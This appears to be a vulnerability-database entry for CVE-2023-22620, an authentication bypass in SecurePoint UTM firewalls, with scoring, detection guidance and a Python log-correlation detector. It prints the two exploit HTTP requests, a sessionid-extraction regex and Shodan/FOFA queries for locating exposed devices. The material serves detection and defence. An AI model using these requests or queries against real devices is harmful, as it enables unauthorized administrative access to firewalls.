CVE-2023-22620
Published: 2023-04-12
Priority: P1 · 80 · high · CVSS 3.1: 7.5
CVSS vector: AV:N / AC:H / PR:N / UI:R / S:U / C:H / I:H / A:H
Tags: ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 3.89% (88.9th percentile)
An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid authentication attempt. This can afterwards be used to bypass the device's authentication and get access to the administrative interface.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| securepoint | unified_threat_management | >= 12.2.3.1 < 12.2.5.1 | 12.2.5.1 |
Detection & IOCs (extracted from sources)
Command (stage 1, invalid login that leaks a sessionid):

```http
POST /spcgi.cgi HTTP/1.1
Content-Type: application/json; charset=UTF-8

{"module":"auth","command":["login"],"sessionid":"","arguments":{"user":"","pass":""}}
```

Command (stage 2, reuse of the leaked sessionid):

```http
POST /spcgi.cgi HTTP/1.1
Content-Type: application/json; charset=UTF-8

{"module":"system","command":["config","get"],"sessionid":"{{session}}"}
```

yara / regex (extracts the leaked sessionid from the stage-1 response): `"sessionid": "([a-z0-9]+)"`
- Monitor for POST requests to /spcgi.cgi with an empty 'sessionid', 'user', and 'pass' in the JSON body; this is the first stage of the exploit and is what triggers the session ID disclosure.
- Detect a follow-up POST to /spcgi.cgi with module 'system' and command 'config get' whose sessionid was obtained from the prior unauthenticated request; this indicates authentication bypass.
- A JSON response containing '"status":"OK"' from /spcgi.cgi to the follow-up request made with the leaked sessionid confirms that the bypass succeeded.
- Use Shodan/FOFA queries to identify exposed SecurePoint UTM instances: Shodan `title:"Securepoint UTM"`, FOFA `title="securepoint utm"`, Google `intitle:"securepoint utm"`.
- The vulnerability affects SecurePoint UTM versions before 12.2.5.1 only; patched versions are not susceptible.
- The exploit is a two-step process: first an invalid authentication attempt leaks a sessionid, then that sessionid is reused to access the administrative interface. Single-request detections will miss the full attack chain.
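The two-stage correlation described in the notes above, as an added example written for this page (it is not from the Nuclei template, the advisory, or any vendor tooling). It assumes a log source that records the JSON request and response bodies of /spcgi.cgi calls, one JSON record per line with the field names `ts`, `src`, `method`, `path`, `req` and `resp`; that format and the sample lines are constructed for the example. A stage-1 probe is raised on its own, but a bypass is only raised when a `system`/`config get` call reuses a sessionid that a probe leaked, and it is marked confirmed when the response carries `"status":"OK"`.

```python
"""Added example: correlate the two CVE-2023-22620 stages across log lines.
The log format, field names and sample records are assumptions, not a real
device or proxy format."""
import json
import re

# The page's extractor regex has a space after the colon ("sessionid": "...");
# \s* matches that form and compact JSON alike.
SESSIONID_RE = re.compile(r'"sessionid":\s*"([a-z0-9]+)"')
STATUS_OK_RE = re.compile(r'"status"\s*:\s*"OK"')

# Constructed sample log from a hypothetical reverse proxy that records request
# and response bodies. Addresses are from documentation ranges.
SAMPLE_LOG = r'''
{"ts":"2023-12-04T10:00:01Z","src":"198.51.100.7","method":"POST","path":"/spcgi.cgi","req":"{\"module\":\"auth\",\"command\":[\"login\"],\"sessionid\":\"\",\"arguments\":{\"user\":\"\",\"pass\":\"\"}}","resp":"{\"status\":\"ERROR\",\"sessionid\":\"a1b2c3d4e5f6\",\"message\":\"invalid login\"}"}
{"ts":"2023-12-04T10:00:02Z","src":"198.51.100.7","method":"POST","path":"/spcgi.cgi","req":"{\"module\":\"system\",\"command\":[\"config\",\"get\"],\"sessionid\":\"a1b2c3d4e5f6\"}","resp":"{\"status\":\"OK\",\"data\":{}}"}
{"ts":"2023-12-04T10:05:00Z","src":"203.0.113.9","method":"POST","path":"/spcgi.cgi","req":"{\"module\":\"auth\",\"command\":[\"login\"],\"sessionid\":\"\",\"arguments\":{\"user\":\"admin\",\"pass\":\"correct horse\"}}","resp":"{\"status\":\"OK\",\"sessionid\":\"f00dbabe0001\"}"}
{"ts":"2023-12-04T10:05:01Z","src":"203.0.113.9","method":"POST","path":"/spcgi.cgi","req":"{\"module\":\"system\",\"command\":[\"config\",\"get\"],\"sessionid\":\"f00dbabe0001\"}","resp":"{\"status\":\"OK\",\"data\":{}}"}
{"ts":"2023-12-04T10:09:00Z","src":"192.0.2.5","method":"POST","path":"/spcgi.cgi","req":"{\"module\":\"auth\",\"command\":[\"login\"],\"sessionid\":\"\",\"arguments\":{\"user\":\"\",\"pass\":\"\"}}","resp":"{\"status\":\"ERROR\",\"sessionid\":\"deadbeef1234\"}"}
'''.strip()


def parse_record(line):
    """Parse one log line; a request body that is not JSON yields req_json=None."""
    rec = json.loads(line)
    try:
        rec["req_json"] = json.loads(rec.get("req") or "")
    except ValueError:
        rec["req_json"] = None
    return rec


def is_leak_probe(req):
    """Stage 1: auth/login with empty sessionid, user and pass (the invalid login that leaks a sessionid)."""
    if not isinstance(req, dict):
        return False
    args = req.get("arguments") or {}
    return (req.get("module") == "auth"
            and "login" in (req.get("command") or [])
            and req.get("sessionid") == ""
            and args.get("user") == ""
            and args.get("pass") == "")


def is_config_read(req):
    """Stage 2: system/config get, the admin-level call used to prove the bypass."""
    return (isinstance(req, dict)
            and req.get("module") == "system"
            and req.get("command") == ["config", "get"])


def detect(log_text):
    """Return alerts: stage-1 probes, plus stage-2 calls whose sessionid came from a probe."""
    leaked = {}   # sessionid -> source address of the probe that leaked it
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_record(line)
        if rec.get("method") != "POST" or rec.get("path") != "/spcgi.cgi":
            continue
        req = rec["req_json"]
        if is_leak_probe(req):
            m = SESSIONID_RE.search(rec.get("resp", ""))
            sid = m.group(1) if m else None
            alerts.append({"stage": 1, "src": rec["src"], "sessionid": sid, "ts": rec["ts"]})
            if sid:
                leaked[sid] = rec["src"]
        elif is_config_read(req) and req.get("sessionid") in leaked:
            sid = req["sessionid"]
            alerts.append({"stage": 2, "src": rec["src"], "sessionid": sid, "ts": rec["ts"],
                           "leaked_to": leaked[sid],
                           "confirmed": bool(STATUS_OK_RE.search(rec.get("resp", "")))})
    return alerts


def summarize(alerts):
    """Count probes (stage 1) and confirmed bypasses (stage 2 answered with status OK)."""
    return {"probes": sum(1 for a in alerts if a["stage"] == 1),
            "bypasses": sum(1 for a in alerts if a["stage"] == 2 and a["confirmed"])}


if __name__ == "__main__":
    found = detect(SAMPLE_LOG)
    for alert in found:
        print(alert)
    print(summarize(found))
```

The legitimate administrator in the sample (non-empty user and pass, then a config read with the sessionid the device issued) produces no alert, which is the point of keying stage 2 on sessionids that a probe leaked rather than on `config get` alone. The approach needs request bodies in the log; a proxy or WAF that logs only method and path can still catch the probe pattern by rate, but cannot tie the follow-up to the leak.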
CVSS provenance
- NVD (CVSS v3.1): 7.5 HIGH, CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
- VulnCheck: 7.5 HIGH
GHSA
GHSA-84pv-v7vg-7784 · ghsa_unreviewed · 2023-04-13 · HIGH · CWE-863 (Incorrect Authorization)
Description: same text as above.
VulnCheck
securepoint unified_threat_management: Incorrect Authorization · vulncheck · 2023 · CVSS 7.5 HIGH
Description: same text as above.
Affected: securepoint unified_threat_management
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References:
- https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-04&host_type=src&vulnerability=cve-2023-22620
- https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=202
No detection rules found.
Nuclei
SecurePoint UTM 12.x Session ID Leak · nuclei · CVSS 7.5 HIGH
Description: same text as above.
Template (as indexed on the page; the `impact` field is cut off in the source):

```yaml
id: CVE-2023-22620

info:
  name: SecurePoint UTM 12.x Session ID Leak
  author: DhiyaneshDK
  severity: high
  description: |
    An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid authentication attempt. This can afterwards be used to bypass the device's authentication and get access to the administrative interface.
  impact: |
    Successful exploitation of this vulnera
```
No writeups or analysis indexed.
References
- http://packetstormsecurity.com/files/171924/SecurePoint-UTM-12.x-Session-ID-Leak.html
- http://seclists.org/fulldisclosure/2023/Apr/7
- https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2023-22620.txt
- https://rcesecurity.com